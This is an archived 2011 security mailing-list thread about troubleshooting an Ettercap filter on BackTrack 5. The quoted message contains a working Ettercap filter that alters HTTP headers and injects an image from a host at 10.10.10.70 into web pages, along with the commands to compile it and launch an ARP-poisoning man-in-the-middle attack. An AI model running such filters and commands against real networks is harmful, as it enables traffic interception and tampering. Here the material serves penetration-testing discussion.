I've not tried to use Ettercap in BT5 as yet. However you can file BT5 bug reports here; http://redmine.backtrack-linux.org:8080/
Ryan Dewhurst blog www.ethicalhack3r.co.uk projects www.dvwa.co.uk | www.webwordcount.com twitter www.twitter.com/ethicalhack3r On Wed, Jun 15, 2011 at 1:13 PM, Joshua Wright <[email protected]> wrote: > Has anyone successfully used Ettercap with a filter on BT5? > > On BT4R2, this script works like a champ: > > if (ip.proto == TCP && tcp.dst == 80) { > if (search(DATA.data, "If-Modified-Since")) { > replace("Accept-Encoding", "If-PACified-Since"); > msg("Killed If-Modified-Since\n"); > } > } > if (ip.proto == TCP && tcp.src == 80) { > replace("img src=", "img src=\"http://10.10.10.70/pwned.jpg\"; "); > msg("pwned image injected\n"); > } > > # etterfilter -o pwned.ef pwned.filter > # ettercap -TqM arp:remote -F pwned.ef // // > > In testing with BT5 however, I see the logging messages, and the packets > are injected by Ettercap, but the original frames are not dropped. I > validated this on the victim where he gets the original packets > immediately followed by the Ettercap-modified packets. The follow-up > packets are dropped by the victim as TCP retransmissions. > > I confirmed this behavior on BT5 VM and booting from a DVD natively. > > I'm guessing this is due to something having changed in the kernel from > BT4R2 to BT5, but I'm not sure what it could be. I checked > /sys/net/ipv4/ip_forward, but it is set to 0. Any other suggestions? > > Thanks, > > -Josh > _______________________________________________ > Pauldotcom mailing list > [email protected] > http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom > Main Web Site: http://pauldotcom.com >
_______________________________________________ Pauldotcom mailing list [email protected] http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
![http://10.10.10.70/pwned.jpg\"](http://10.10.10.70/pwned.jpg\"){kind=link}